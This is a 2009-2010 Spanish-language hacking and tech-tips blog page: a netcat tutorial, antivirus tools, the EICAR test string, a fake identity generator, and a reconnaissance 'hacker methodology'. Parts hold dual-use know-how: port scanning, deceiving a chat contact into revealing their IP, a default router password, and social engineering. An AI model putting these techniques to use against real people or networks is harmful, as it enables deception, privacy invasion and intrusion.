Solo el conocimiento te hace libre

NetCat

2010-01-10T19:42:00.004+01:00

NetCat, la navaja suiza de los hackers y administradores................

Netcat es un pequeño programa creado para uso de los
administradores de redes (y por supuesto para los Hackers) :), este
proggie fue creado originalmente por Hobbit y porteado a Win95 y NT por
Weld Pond de L0pht , tiene mas de un año desde que fue Liberado y muy
poco se ha escrito sobre este Programita; Principalmente porque la estructura
de sus comandos es poco familiar para el usuario medio. Netcat tiene
infinidad de funciones, aunque se deja que sea el usuario quien las
averigue :P, y en el archivo de ayuda ponen algunos ejemplitos muy
elementales solamente...

La especialidad de NetCat es el Protocolo tcp/ip, y le dá a la
máquina de windows, cierto poder sobre este protocolo que solo tenía
UNIX, trabaja con lineas de comandos desde MS-DOS (o desde el
Shell de Linux), y según parece, puede hacer casi cualquier cosa sobre
TCP/IP. El comando principal es nc con su respectiva variable u opción
al mas puro estilio Unix.

Cabe destacar que la información sobre Netcat y sus usos
especificos es bastante limitada; aunque Hobbit en su documento aclara
muchas cosas, cita algunos ejemplos y dice que NetCat puede ser utilizado
para mas de 1001 vainas...

Ejemplos de como utilizar -NETCAT-.

(estos ejemplos pueden ser variados dependiendo de los modificadores)

Si queremos saber que versión de servidor esta corriendo en un puerto remoto

Supongamos que queremos saber que versión webserver corre una determinada ip, para ello supongamos que la IP es 1.1.1.1, entonces tipearemos lo siguiente:

C:\nc –v –v 1.1.1.1 80

Donde nc es la invocación al netcat, -v –v nos dará todo la info visible del servidor que esta corriendo, 1.1.1.1 es la ip y 80 el puerto al que nos queremos conectar, bien, no solo que nos dio la versión del servidor si no que ahora estamos conectados al webserver y podemos realizar las operaciones normales que podría hacer el browser(en línea de comandos, por su puesto), pero eso para otro capitulo jejejejejeje.

Si quisiéramos saber la versión de cualquier otro servidor solo habrá que conectarse a el a través de su ip + puerto con la opción very vervose y ya sabremos algo de ese servicio ;)

Un chat p2p

Se necesita que los dos tengan netcat, uno va a actuar de servidor y otro de cliente.

EL SERVER

C:\nc –l –p (numero de puerto)

Donde nc llama al netcat, -l se pone a la escucha o en modo servidor, y –p es el puerto por donde escuchara

EL CLIENTE

C:\nc ip puerto

Donde nc llama al netcat, ip es la ip del server, y puerto el puerto que este abrió

Una vez realizado esto, podrán escribir en la pantalla donde esta corriendo netcat y al dar ENTER el otro vera lo que escribamos, una opción rápida y segura

Como sacar la ip de cualquier mensajero ( y algunos otros datos jejejjej)

Primero usamos la herramienta netcat (o nc) con la siguientes modificadores:

C:\nc -v -v -l -p 80

Donde nc llama al netcat, -v –v lo pone en modo very verbose y eso hace que al conectarse alguien a nuestra ip y puerto le rastrea la ip y los datos del browser y sistema operativo, -l lo pone en modo escucha o servidor , y –p 80 le asigna el puerto 80 a la escucha

Luego le pasamos lo siguiente, http://nuestra ip (usando alguna excusa, si no queremos que nuestro contacto sospeche), automáticamente se abrirá su navegador y se dirigirá a donde esta nuestro netcat a la escucha, entonces veremos en la ventana DOS donde se esta ejecutando el netcat, la ip de nuestro contacto ( con suerte también veremos la versión del navegador que usa y alguna que otra cosita mas)luego que tomamos nota de la ip, hacemos ctrl+C para cerrar netcat, y le aparecerá a nuestro contacto, en el navegador pagina típica de cuando no se encuentra el servidor (esto no pasara hasta que no cerremos el netcat con ctrl+C), buscamos la excusa que mas nos guste para explicar que la page que le pasamos no funciono y listo

Si queremos hacer una trampa para lammers y capturar su ip

Pues esto se basa en que un lamer, para entrar a una maquina, primero escanea puertos y si encuentra alguno vulnerable (como por ejemplo el puerto de un troyano) entra usando la herramienta necesaria.

Bien, esto se trata de hacerle creer al lammeruzo que tenemos esos puertos que abren los servidores de los troyanos abiertos (por lo tanto pensara que estamos infectados y tratara de entrar por ese puerto y allí tendremos el netcat listo para cazar su ip

Para esto abriremos tantos netcat como puertos queramos simular infección (seria bueno que busques una lista de puertos que usan los troyanos y abras los que te parezcan) y lo haremos si con cada puerto

C:\nc -v -v -l -p (numero de puerto de troyano)

Donde nc llama al netcat, -v –v lo pone en modo very verbose y eso hace que al conectarse alguien a nuestra ip y puerto le rastrea la ip y los datos del cliente que uso para conectarse, -l lo pone en modo escucha o servidor, y –p (será el puerto que simulara que allí hay un troyano), listo de esa manera ya tenemos la ip de quien trato de entrar a nuestra maquina a través de un troyano.

Cabe destacar que esto sirve para cualquier servicio como ser web o ftp

Mostrar una pagina web con netcat (o como simular un webserver)

Todos sabemos que si queremos mostrar una pagina web necesitamos un webserver, bien aquí vamos a improvisar uno (simulado lógicamente).

Para mostrar nuestra page en Internet haremos esto:

1) guardamos el html que queremos mostrar, en la misma carpeta que se encuentra netcat, luego tipemos esto:

C:\nc –l –p 80 <>

Donde nc llama al netcat, -l hace que se ponga a la escucha, -p 80 hace que el puerto que escucha sea el el 80(el mismo del http), <>

Cabe destacar que cada vez que alguien se desconecta tendremos que volver a realizar la operación para que vuelva a ser visto el html

Transferir archivos con netcat

Para transferir archivos con netacat primero tendré que destacar que solo hice la prueba con archivos zipeados, pero pueden probar con otros formatos, además, netcat no puede ver el EOF(end of file o final de archivo) así que no terminara la transferencia por si solo, cuando estimen un tiempo prudencial (si lo hacen antes de que termine se corta y se daña el archivo)deben darle ctrl+C para terminar la transferencia y así hacer un EOF. Bien, dicho esto pasemos al trabajo. Necesitaremos uno que haga de Server (el que envía el archivo) y uno que haga de cliente (el que recibe el archivo), para ello tipearemos:

EL SERVER

C:\nc –l –p (puerto) <>

Donde nc llama al netcat, -l pone le puerto a la escucha, -p (puerto) sera el puerto que pondremos a la escucha, <>

EL CLIENTE

C:\nc ip puerto > archivo.zip

Donde nc llama al netcat, ip es la ip a la que queremos conectar, puerto es al puerto remoto que queremos conectar , > archivo,zip, es el redireccionamiento de la entrada a un archivo.

Listo, si tenemos en cuenta todas las recomendaciones, transferiremos sin problemas

Conectarse a irc con netcat

Bien para esto hay que destacar que es sencillo lograr la conexión pero no hay que olvidar que una vez lograda hay que “hablar idioma servidor” o sea hacer toda la negociación a mano.

Para ello vamos a topear:

C:\nc servidor irc puerto

Donde nc llama al netcat, servidor irc es el servidor al que nos queremos conectar, y puerto el puerto al cual vamos a conectarnos (para graficarlo mejor vamos a poner de ejemplo una conexión al canal yashira que esta en el sevidor irc.cl, el comando seria así nc irc.cl 6667, y listo ya estaríamos conectados), pero en esta parte considero que poner un ejemplo totalmente practico ayudaría bastante, por eso voy a desarrollar un ejemplo de cómo me conecto al canal yashira con netcat

Para hacerlo tipeo el comando que me conecta

Luego tipeo PONG mi ip (esto debo hacerlo rápidamente para que no de time out la conexión).

Inmediatamente tenemos que identificarnos para eso topeamos:

USER nombre que elijas (no es tu nick) tu host tu servidor: tu nombre real(esto puedes omitirlo, pero no olvides poner : y luego dejarlo vació), luego de eso tipeas:

NICK tu nick

pero mas grafico lo hago con el ejemplo practico:

USER yo NETGlobalis.irc.cl :

NICK cadorna

aquí ya esta en el irc.cl para entrar al canal tipeas:

join #canal (en mi caso join #yashira)

ya tamos en el canal, ahora si queres hablar tipeas:

PRIVMSG #canal :texto (en mi caso digo hola, PRIVMSG #yashira : hola)

Cabe destacar que si bien es un método complicado y muchas veces las negociaciones dependen del servidor, nos muestra la versatilidad de netcat, y estos no son todos los comandos de irc experimenta comandos que usas en el con netcat, tal vez resulte interesante (les dejo un poco de experimentación para ustedes, si no me van a matar jajajajajajaaj)

Hacer un sencillo escanner de puertos con netcat

Esto es muy simple para chequear los puertos abiertos de una maquina debemos topear:

C:\nc –v –v -z ip puerto (cabe destacar que si queremos hacer un scanner de rango de puertos debemos separa ese rango con un “-“ por ejemplo queremos escasear todos los puertos desde el 21 al 139, debemos hacer así: nc –v –v –z ip 21-139, y si lo que queremos es escasear puertos determinados hay que separar los números de puertos con espacio por ejemplo nc –v –v –z ip 21 25 139, de esta manera buscara solo en esos puertos)

Donde nc llama al netcat, -v-v lo pone en modo veri vervose(ideal para sacar datos), z realiza la llamada al puerto pero si llegar a hacer la transacción de conexión, ip es la ip a escannear , y puerto es el puerto a escannear, esto nos devolverá una lectura de open(puerto abierto) o conection refused (puerto cerrado), y hasta a lo mejor recibas que servicio esta corriendo en ese puerto abierto

fuente: http://hackdosx.blogspot.com/

Cómo eliminar virus de MSN Messenger y Windows Live Messenger

2010-01-07T18:13:00.003+01:00

Aqui tenis un recopilatorio de los programas mas usado:

Recientemente, las mentes dedicadas a la creación de virus han centrado sus esfuerzos en el cliente de mensajería instantánea de Microsoft.

Por suerte, otras mentes más generosas se han puesto manos a la obra y han contraatacado con programas específicos para eliminar los virus del Messenger.

En este artículo recopilamos varias herramientas para eliminar virus de MSN Messenger. ¿Quieres conocerlas?

La primera utilidad es MSN Virus Remover. Está en español y mantiene su base de datos de virus actualizada. En este momento detecta 11.675 virus.

Además, si el virus te había bloqueado el acceso al Editor del Registro, al Administrador de tareas, a la configuración de las funciones de restauración o a las Opciones de carpeta, MSN Virus Remover te lo devuelve.

Otra interesante opción es MSN Virus Cleaner. Analiza, detecta y elimina los procesos sospechosos relacionados con MSN Messenger. También tiene accesos para desinfectar archivo y carpeta, así como para eliminar la caché y vaciar la Papelera de Reciclaje.

Una ventaja de MSN Virus Cleaner es que detecta y elimina virus de otros clientes de mensajería como Yahoo! Messenger o AOL.

También existe Live Kill Clean Messenger pero parece un proyecto abandonado, cuanto menos inacabado. Sólo lo recomendamos por si los dos anteriores no han conseguido eliminar el virus que tengas y no te importa probar suerte con LiveKill Clean Messenger.

Finalizamos con el más popular: MSNCleaner. Está en español, no requiere instalación, es rápido, eficaz, seguro y fácil de utilizar.

Como MSN Virus Remover, MSNCleaner también te devuelve el acceso al Editor del Registro, al Administrador de tareas, a la configuración de las funciones de restauración o a las Opciones de carpeta. Además, también restaura el archivo Hosts (a tener en cuenta si lo tenías personalizado).

fuemte:http://es.onsoftware.com/

Recupera archivos borrados en tu disco duro o tarjeta de memoria

2010-01-03T17:36:00.002+01:00

¿Has borrado archivos sin querer? No te desesperes, hoy en día hay decenas de aplicaciones para recuperar los archivos borrados, Undelete Plus sin ir más lejos.

Este programa gratuito analizará tu disco duro, dale tiempo, este proceso suele tardar mucho (incluso horas, dependiendo del tamaño del disco duro), y te mostrará todos los archivos que encuentre.

Como sabrás, cuando un archivo se borra el espacio que ocupaba en tu disco duro pasa a estar libre, así que si has seguido utilizando ese PC aumentan las posibilidades de que el espacio que ocupaba el archivo haya sido ocupado por un nuevo inquilino, con lo que será más complicado que lo puedas recuperar. Undelete Plus te lo indica en su columna "Estado".

Volviendo al programa, encontramos dos interesantes cualidades: la ordenación por tipos de archivos y el filtro. La primera resulta muy útil si deseas recuperar algún tipo de archivo en concreto, un documento, unas fotos, etc. La segunda cualidad es utilísima para ver sólo los archivos que reúnan las características que le indiques, como mayor o menor de un tamaño concreto, los comprendidos entre una fecha o los que contengan una determinada palabra en su nombre.

Undelete Plus soporta los siguientes formatos:

Sistemas de archivos: NTFS/NTFS5, FAT12/FAT16/FAT32

Cambios recientes en Undelete Plus:

Pequeños cambios en la interfaz

Para utilizar Undelete Plus necesitas:

Sistema operativo: Win98/98SE/Me/2000/NT/XP/2003

0 Day en Adobe Acrobat Reader

2009-12-28T14:30:00.002+01:00

Bueno de nuevo tenemos otra vulnerabilidad 0 day en una aplicación muy conocida y utilizada por muchos usuarios, Adobe Acrobat Reader.

La gente de Adobe no ganan para sustos y es que dicho bug es incluso indetectable por las mejores soluciones antivirus (aunque se espera que esto cambie en breve) la vulnerabilidad identificada como CVE-2009-4324 es critica y por ello se han publicado unos consejos para paliar en la medida de lo posible este agujero hasta que este disponible el parche que resuelva el problema que segun Adobe sera el 12 de Enero.

¿Como protegernos?

Una de las opciones para protegernos mientras llega el día D seria esta aplicación Acrobat JavaScript Blacklist Framework que descarga un par de archivos que modifican el registro. Otra opción viable seria el desactivar Javascript del propio Acrobat Reader desde Editar--Preferencias--Javascript, por supuesto el utilizar el Addons Noscript para los usuarios de Firefox no viene nada mal para esta situación en cuestión y para muchas otras , en fin que como veis podemos protegernos mientras llega el ansiado día 12 de Enero. Por ultimo podemos elegir por desinstalar directamente la aplicación de Adobe e instalar otro lector de archivos PDF como por ejemplo los que aparecen en esta web.

Para mas información sobre esta vulnerabilidad critica Adobe a puesto a disposición de los usuarios esta pagina blog PSIRT desde donde la cual podremos seguir las evoluciones del bug que afecta actualmente a Adobe Acrobat Reader.

Fuente: Hackdosx

Verificar si el antivirus funciona correctamente

2009-12-22T15:15:00.002+01:00

En muchas ocasiones dudamos si nuestro antivirus está funcionando de la forma en que debe, es decir, si está siempre activo (modo residente), actualizado y pendiente de todo lo que en nuestro sistema se ejecuta; pero, ¿cómo podemos saberlo? Fácil, un simple truco.

Copiar un codigo malicioso en el block de notas y guardarlo si el anti-virus lo detcta funciona bien.

1. Abrimos el Bloc de notas, luego escribimos la siguiente línea de código:

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*.

2. Guardamos el archivo de texto. En seguida, el antivirus debe mostrarnos de una vez la advertencia de que encontró un código malicioso.

3. Si el antivirus no te envía ninguna alerta, algo está mal, así que debes verificar qué está pasando, reinistalar el antivirus, o buscar alguna solución alterna.

Este pequeño código (“malicioso”) simulará un virus, por lo que el antivirus lo va a detectar como si se tratara de alguno, pero no te preocupes, que si lo detecta como tal, debes más bien alegrarte, pues estarás seguro de que tu antivirus funciona correctamente.

Eliminar falsos antivirus del sistema con Remove Fake Antivirus

2009-12-21T19:43:00.001+01:00

¿Falsos antivirus? Muchas veces hemos leído en blogs como el de SpamLoco que existen antivirus que no son tan auténticos como tal, sino que se tratan de programas espía que te engañan, promocionándote una solución en su “gran antivirus” a problemas de seguridad.

Entonces cuando procedemos a instalar estos antivirus falsos, nuestro sistema se llenará de cualquier basura informática. Pero tranquilo, que para combatir esas porquerías conocí Remove Fake Antivirus, cuyo objetivo es eliminar falsos antivirus instalados en tu sistema.

Pues bien, los falsos antivirus que soporta Remove Fake Antivirus son: Personal Antivirus, Anti-Virus-1, Spyware Guard 2008, Antivirus 360, SystemGuard2009, Antivirus 2009, System Security, Antivirus 2010, Antivirus Pro 2009, y MS Antispyware 2009. Son los más comunes.

Remove Fake Antivirus está en inglés, lamentablemente, pero funciona en Windows Vista, XP, 2003, 7, entre otros. Aunque carece de diferentes opciones para el usuario, lo que sí le aseguro a cualquier lector del blog es que es muy fácil de usar y a su vez bastante efectivo.

Enlace web | Remove Fake Antivirus

fuente: http://www.bloginformatico.com

E-mail desechable, anónimo y gratuito. Servicio Anti SPAM.

2009-12-19T16:17:00.003+01:00

Correo Electrónico Temporal

Todas las posibilidades de direcciones temporales ya existen

Disponga de un correo electrónico válido para sus inscripciones en Internet. Todas las cajas de recepción están disponibles y accesibles sin inscripción ni contraseña

No registro!

Sin contraseñ!

auto generados buzón!

mensajes de 8 días mantenido!

Este correo electrónico cubo de la basura y anti-spam le permitirá no recibir más a los correos indeseables sobre su cuenta e-mail personal.

¿Cómo funciona esto?

Basta con utilizar cualquier correo electrónico desechable (ex : '@yopmail.com') para sus inscripciones, demandas de informaciones o de documentaciones sobre los sitios Internet. El mails enviados por estos sitios son instantáneamente consultables en su buzón provisional '' sobre el sitio www.yopmail.com o directamente por: http://www.yopmail.com?quenimporte
No es necesario crear una dirección sobre YopMail.com: todas las posibilidades ya existen. Estos correos electrónicos falsos jamás son suprimidos. En cambio, cada mensaje automáticamente es suprimido al cabo de 8 días. Es tan posible suprimir manualmente los mensajes leídos .
YopMail no permite el envío de e-mail anónimo. Usted puede sin embargo enviar un e-mail anónimo hacia las direcciones YopMail.

enlace: http://www.yopmail.com/es/

Ultimate Boot CD para Windows

2009-12-18T16:09:00.003+01:00

El sistema operativo de Microsoft es una verdadera caja de ( ~~sorpresas)~~ disgustos, y esto resulta especialmente sangrante para los que somos aficionados a hacerle pasar por todas las perrerías posibles. Seguro que a más de uno le ha pasado que, por haber toqueteado lo que no debía, o simplemente por un error humano perfectamente comprensible, el buen Windows le decide dejar de arrancar.

¿Qué toca entonces? Pues ya se sabe: formateo y a empezar de nuevo, aunque puede que con ello perdamos material personal o profesional muy valioso (esas copias de seguridad…). Por suerte hay una alternativa bastante efectiva para este problema, y encima de todo es gratuita. Se trata de Ultimate Boot CD, un disco de arranque que incluye una importante colección de herramientas de diagnóstico y reparación de errores, y gracias a las cuales es capaz de solucionar casi cualquier fallo del sistema. No resulta infalible, pero en cualquier caso es un elemento directamente imprescindible en todos aquellos hogares que usen el “Ventanas”.

Mirrors de descarga de Ultimate Boot CD 3.4

Generador de identidades falsas

2009-12-16T18:25:00.004+01:00

Generador de identidades falsas.....

Si quieres registrarte en una web y ese dia no te encuentras lo suficientemente inspirado como para inventarte todos los campos se suelen requerir te vendrá muy bien este generador de identidades falsas.

La identidad es configurable (sexo, país...) y muy completa, incluso incluye numero de Visa con fecha de caducidad. El resultado lo puedes guardar como permalink o vCard. Un ejemplo de personalidad generada con esta web:

Jodi R. Glass
899 Pell Drive
Fort Lauderdale, FL 33301

Email Address: Jodi.R.Glass@mytrashmail.com

Phone: 954-825-1716
Mother's maiden name: Huebner
Birthday: March 16, 1980

Visa: 4539 7828 0655 6150
Expires: 1/2009

Los fallos del software de código abierto se solucionan antes

2009-12-13T20:14:00.003+01:00

Una serie de estadísticas realizadas por la compañía Vercacode afirman que tres cuartas partes del software no cumplen con un nivel aceptable de seguridad.

El software de código abierto es más propenso a fallos graves de seguridad, pero se arreglan más rápido. Esto es al menos lo que se desprende de una investigación realizada por la empresa de seguridad Veracode y a la que ha tenido acceso V3.co.uk.

El proyecto Open Source Ratings Database es un repositorio centralizado de evaluaciones de seguridad de programas de código abierto que incluye el análisis de cerca de cien aplicaciones empresariales, incluidas Firefox, Apache, MySQL o JBoss.

Los últimos datos muestran que el 24% del software open source tiene un “nivel de seguridad aceptable” y que el software comercial es sólo ligeramente peor, con un porcentaje del 23%. Del informe también se desprende que el 23% de la fuente abierta, y sólo el 5% de las aplicaciones comerciales, contienen al menos un fallo de seguridad grave.

En cuanto a los tiempos, al software de código abierto le lleva menos de una semana remediar una vulnerabilidad, según la investigación.

Fuente:
Por Rosalía Arroyo
http://www.itespresso.es

Metodología del Hacker

2009-12-12T19:30:00.003+01:00

1.- Búsqueda de Información

Una cautelosa búsqueda de sistemas y recopilación de información es el primer paso antes de
ponerse a experimentar. Debe comprobarse qué máquinas componen el sistema y qué rango de
direcciones IP ocupan. Esto nos dará una idea del alcance y la complejidad del trabajo que va a ser
realizado y ayuda a identificar los puntos débiles por los que hay que empezar a realizar las pruebas.
Muchas veces podemos tener acceso a información pública sobre una empresa cualquiera, pero no
conocemos los métodos para conseguirla. La base de datos NIC (Network Information Center), donde
se almacenan los datos de las personas o empresas que han comprado un dominio de tipo .com, .mx,
.net, etc, es un buen punto por donde arrancar. Con esta base de datos NIC podremos encontrar
nombre de los responsables, tanto técnicos como administrativos, números de teléfono, correos,
direcciones físicas. Esta dirección está ahí para gestionar la compra de dominios. Los datos son
públicos y pueden ser consultados por cualquier persona. Es análogo a la Sección Amarilla de la guía
telefónica, pero referida a los dominios en Internet.

Con este tipo de consultas se pueden evitar estafas como las de Banamexnet, haciendo una
comprobación para saber si un dominio sospechoso pertenece realmente a la entidad que parece
representar. Al consultar un dominio, la información viene dividida en cuatro secciones:
Empresa: Lo más relevante resulta la dirección física de la empresa, el contacto técnico y los
servidores de nombres. Esto último resulta especialmente atractivo para el hacker.
Contacto administrativo: Nombre, correo electrónico, teléfono y fax.
Contacto técnico: Este dato también se presenta interesante en caso de ser necesario avisar sobre
algún error de seguridad en su página. Aquí se puede consultar su correo electrónico, nombre,
teléfono, etc.
Contacto de facturación: Igualmente se consultan correo electrónico, nombre, teléfono, etc.
Para empresas internacionales cuyo dominio termine en .com o .net, podemos echar mano del
servicio whois10 de nic.com (http://www.nic.com/nic_info/whois.htm), donde la información
proporcionada viene a ser la misma.
Serán muchas las ocasiones en que el buen uso de un buscador nos puede ahorrar mucho tiempo de
investigación.
Imaginémonos que a partir de nic.es averiguamos el email del administrador o el responsible técnico
de la empresa. O, mejor aún, mediante un ataque de ingeniería social averiguamos su dirección
personal de hotmail o cualquier otro servidor de correo web. Introducimos su email en el navegador y
nos lleva a varias páginas más o menos interesantes. En una de ellas llegamos a descubrir que hace
tan solo unos meses, estampó su dirección real en una lista de correo especializada sobre
herramientas pidiendo asesoría y presupuestos sobre actualizaciones de routers.
Muchos administradores de sistemas se enfrentan casi a diario con nuevo software y tienen que
pedir ayuda a especialistas en internet en busca de consejo y compartir experiencias propias. Esto no
es raro y resulta incluso frecuente. Lo que a muchos se les pasa, y en esto entra la ignorancia, es
que hay que hacerlo de manera anónima. Esta es una de las maneras más limpias y libre de
molestias con las que los hackers encuentran información sin tener que sumergirse en manuales o
hacer pruebas en decenas de programas, además, en casos así o parecidos, ya tenemos la certeza de
que el router es o ha sido vulnerable y que puede existir realmente una forma de atacar. Un router
(encaminador, direccionador, enrutador) es un dispositivo que distribuye tráfico entre redes. La
decisión sobre a donde enviar los datos se realiza en base a información de nivel de red y tablas de direccionamiento.

2.- Escaneo de Puertos

Nos centraremos en el aspecto práctico en el capítulo sobre escaneadores de puertos (página 91).
Gracias a distintas técnicas sabremos los puertos que el servidor mantiene abiertos ofreciendo
servicios a través de ellos. Cuantos más puertos se encuentren abiertos, más servicios ofrece y más
posibilidades de que alguno sea vulnerable. Este paso resulta imprescindible y de gran importancia.
Hay que advertir: Un escaneo de puertos indiscriminado hacia una máquina que no nos pertenezca
constituye un delito.

3.- Identificación de Servicios

La función de un puerto es tener enlazado un servicio o programa que escuche en él y por el que se
realicen las conexiones necesarias. En este paso se descubre qué programa hace uso de cada puerto,
anotando en conciencia su versión.

4.- Identificación del Sistema

Aunque se puede deducir a partir de la identificación de servicios (existen servicios válidos
únicamente para Windows o Unix) se requerirá comprobar en que plataforma y sistema operativo
esta trabajando el servidor, pues los datos que ofrecen los servicios pueden estar falseados.
Podemos empezar usando la herramienta web netcraft.com, que cuenta con varios servicios. Uno de
ellos nos indica el Sistema Operativo y la versión del servidor web, así como los datos del proveedor
de Internet donde está alojado. Esto esta muy bien por la información que puede darnos.
En esta página hay un servicio llamado “What is this site running” que informa qué software esta
usando para su servicio web. Al introducir alguna dirección web aparecerá algo como esto:
The site www.xxxxx.com is running Apache/1.3.27 (unix) mod_bwprotect/0.2
Mod_log_bytes/1.2 mod_bwlimted/1.0 PHP/4.3.1 frontpage/5.0.2.2510
Mod _ssl/2.8.12 OpenSSL/.09.6b on Linux
En el apartado más abajo, llamado Netblock owner nos lleva a un link en el que podemos conocer
otros sites alojados en el mismo proveedor de caudal de Internet, y propietario del bloque de
direcciones IP. Incluso podremos conocer el lugar geográfico donde se encuentra esa computadora.
Es posible que netcraft.com solo muestre un escueto:
The site www.xxxxx.com is running Apache on Linux
Lo que nos indica que el administrador ha hecho que la información sobre las versiones que usa no
estén disponibles públicamente.
Otro servicio de netcraft es la búsqueda por nombre de dominio. A veces, si buscamos una página
sobre seguridad, por ejemplo, en un buscador como Google, nos llevará a miles de lugares distintos y
no sabremos por donde empezar. A menudo nos trae páginas que nada tienen que ver con la
seguridad, pero que en su texto aparece esa palabra. Buscando por dominio, estaremos buscando
entre todas las direcciones que contienen la palabra “seguridad” en su nombre de dominio:
seguridadempresarial.org, todoenseguridad.com, etc. Netcraft también aloja las estadísticas de uso
de servidores web. En Internet existen básicamente dos programas para servir páginas web: IIS (de
pago y de Microsoft), Apache (el más usado, gratuito y lo hay para Linux y Windows).

5.- Descubrir Vulnerabilidades y Verificación

Ya que tenemos las versiones de los distintos sistemas y programas, así como la versión del Sistema
operativo, es momento de buscar vulnerabilidades conocidas que afecten a esas versiones (en
especifico) de las aplicaciones. Existen listados en la Red que se mantienen al día con las
vulnerabilidades y explican en detalle el problema y como solucionarlo. Por ejemplo: securitytracker,
en su listado refleja las debilidades de sistemas operativos, programas, routers, etc

6.- Verificación de Aplicaciones

No solo las aplicaciones en sí pueden ser vulnerables o no. Quizá se puedan estar usando versiones
parchadas11 a las que no afecte ninguna de las vulnerabilidades conocidas hasta el momento. Pero
aún así, puede que sigan siendo vulnerables por la manera en que están dispuestas o configuradas.
Un programa en el directorio incorrecto dentro de un servidor web, los permisos no adecuados
aplicados a un usuario, todo esto puede derivar en grandes problemas de seguridad que podemos
aprovechar, independientemente de que su software se encuentre actualizado.
11 Los bugs (errores de programación) y ciertas vulnerabilidades severas pueden a veces solucionarse con un software especial,
denominado Patch (Parche), que evita el problema o alivia de algún modo sus efectos.
41

7.- Comprobación del Router (Ruteador)

El router (ruteador) es un servidor de red que mira las direcciones de la red en los paquetes que
recibe antes de decidir si los pasa más adelante. Un router toma decisiones más inteligentes que un
puente sobre los datos que pasa adelante. Un puente sólo decide si pasa o no un paquete, pero un
router puede escoger el mejor camino a lo largo de la red para que el paquete alcance su dirección
de destino. En el contexto TCP/IP, un ruteador es una entrada, una computadora con dos o más
adaptadores de red que está ejecutando algún tipo de software de ruteo IP. Cada adaptador se
conecta a una red física diferente.
Además de dirigir el tráfico, al router se le puede delegar la función de mapear puertos. En el
software que lo compone, se han hallado vulnerabilidades en varias ocasiones que permitían el
acceso a la computadora que lo usaba para salir al Internet. Uno de los problemas más sencillos de
explotar eran las contraseñas por defecto de los routers que la telefónica proporciona a sus clientes.
Si dabas con uno en Internet, tan solo requerías teclear adminttd como username y password para
reconfigurar el acceso a Internet de la víctima.

8.- Cotejo de los Sistemas Confiables

Aquí se comprueba la seguridad desde el interior de la red hacia los servidores. Sirve para comprobar
el nivel de acceso a datos confidenciales que puede obtener un usuario no privilegiado de la red y
hasta qué punto puede comprometer un sistema. Para este punto, se necesita tener acceso directo a
la red y ponerse en el papel de un usuario con ciertos derechos.

9.- Verificación de Firewalls (Cortafuegos)

Los Firewalls protegen los puertos y deciden quién y cómo debe conectarse a los servicios que ofrece
el servidor. Después hablaremos sobre los puertos.

10.- Revisión de los Sistemas de Detección de Intrusos (IDS)

Otra de las herramientas básicas cuando se trata la seguridad en la red. Un IDS es un programa con
utilerías que vigilan la red en busca de ciertos patrones reconocibles de ataques y se les puede
definir el lanzamiento de aplicaciones o distintas acciones al respecto.

11.- Comprobación de las Medidas de Contención

Es obligatorio saber cómo administrar de manera óptima los recursos disponibles y conocer quién
tiene acceso a qué tipos de sistemas y además, estar preparados para cualquier desastre. Hay que
mantener un sistema de respaldos de seguridad y recuperación de datos en caso de accidentes.

12.- Contraseñas

Después de todos los pasos anteriores, si se han explotado con éxito y se ha obtenido algún dato, lo
ideal sería haber obtenido algún archivo de contraseñas, que, si están cifradas, es necesario
descifrar. Si también se obtiene ese dato, podrías abrir todas las puertas del sistema. Más adelante
hablaremos de los rompedores de contraseñas y acerca de las contraseñas ensombrecidas.

13.- Indagación de Denegación de Servicio

La Denegación de Servicio (DoS) y Denegación de Servicio Distribuida (DDoS) consisten en realizar
peticiones al servidor hasta saturar sus recursos. Un ejemplo de DDoS es un ataque a una página
web. Un ejemplo de DoS es inundar el correo de una persona con un millón de e-mails. Más adelante
en este documento hablaremos de este tipo de ataques.
Nota de Advertencia
Es necesario completar todos los pasos para poder sentirse seguro. Haber encontrado un camino
alterno para entrar en el sistema no significa que sea el único.

Fuente:El sendero del hacker

BlueHacking - Definiciones y Herramientas

2009-12-07T21:41:00.001+01:00

BlueJacking

Bluejacking es el envio de mensajes sin permiso a traves de dispositivos con Bluetooth como celulares, PDAs, portatiles y algunos PCs, enviando una vCard, una Nota o un Contacto que usualmente contiene un mensaje el campo del nombre a otro dispositivo Bluetooth a traves del protocolo OBEX.

Bluetooth tiene un rango muy limitado, usualmente alrededor de 10 metros en algunos celulares, pero en portatiles puede superar los 100 metros con algunos transmisores potentes.

El Nombre fue originado por un usuario llamado AJACK, quien estando en un banco, busco algun dispositivo Bluetooth encendido y al encontrar un Nokia 7650, le envio un mensaje diciendo “Compra Sony Ericsson”. El lo llamo bluejacking, y asi se ha hecho desde entonces.

Ajack junto con Droll posteriormente desarrollaron una utlidad para Symbin UIQ llamada SMan que llego a ser la primera utilidad de bluejacking para un smartphone. Ya recientemente se desarrollaron aplicaciones para otras plataformas como java, de las cuales podemos nombrar al Mobiluck, el EasyJack, y una hecha por la misma compañía Nokia llamada Sensor.

Algunos piensan que el termino bluejacking viene de la palabra Bluetooth y la palabra hijacking. Esto sonaria logico, pero un bluejacker no hace hijack con nada: el o ella unicamente usa una opcion en el envio y el dispositivo recipiente (receptor). Un bluejacker no esta en la capacidad de tomar control de tu telefono o de robar informacion personal. ne Mas bien esta orientado a hacer bromas o molestar a alguien, y tal vez de alli es que viene el termino.

El Bluejacking es algo gracioso, porque la persona bluejackeada no sabe lo que esta pasando, y piensa que su telefono esta funcionando mal .

Usualmente un bluejacker solo envia un mensaje de texto, pero con los telefonos modernos es possible hasta enviar imagines o sonidos tambien.

Esto del Bluejacking a sido usado para Tecnicas de marketing en algunos centros comerciales quienes se hacen publicidad a traves de este medio.

Pero con el incremento de los dispositivos con soporte bluetooth , algunos de estos dispositivos (especialmente PDAs y alunos moviles con Symbian) se han vuelto vulnerables, desde ataques de virus, hasta el control total del dispositivo a traves de programas Troyanos.

BlueSnarfing

Bluesnarfing es el robo de informacion de un dispositivo inalambrico a traves de una conexion Bluetooth, ya sea entre telefonos, portatiles o PDAs.

Esto permite acceso al calendario, la lista de contactos, correos y mensajes de texto. Bluesnarfing es mucho mas serio en relacion al Bluejacking, pero ambos “explotan” otros dispositivos Bluetooth sin su conocimiento.

Cualquier dispositivo que tenga encendido el Bluetooth y este se encuentre en Modo Descubierto (osea que puede ser encontrado por otros dispositivos en el rango) puede ser atacado. Apagando esta opcion puede protegerse de la posibilidad de ser Bluesnarfiado. Siendo esto una invasión de la privacidad, el Bluesnarfing es ilegal en algunos paises.

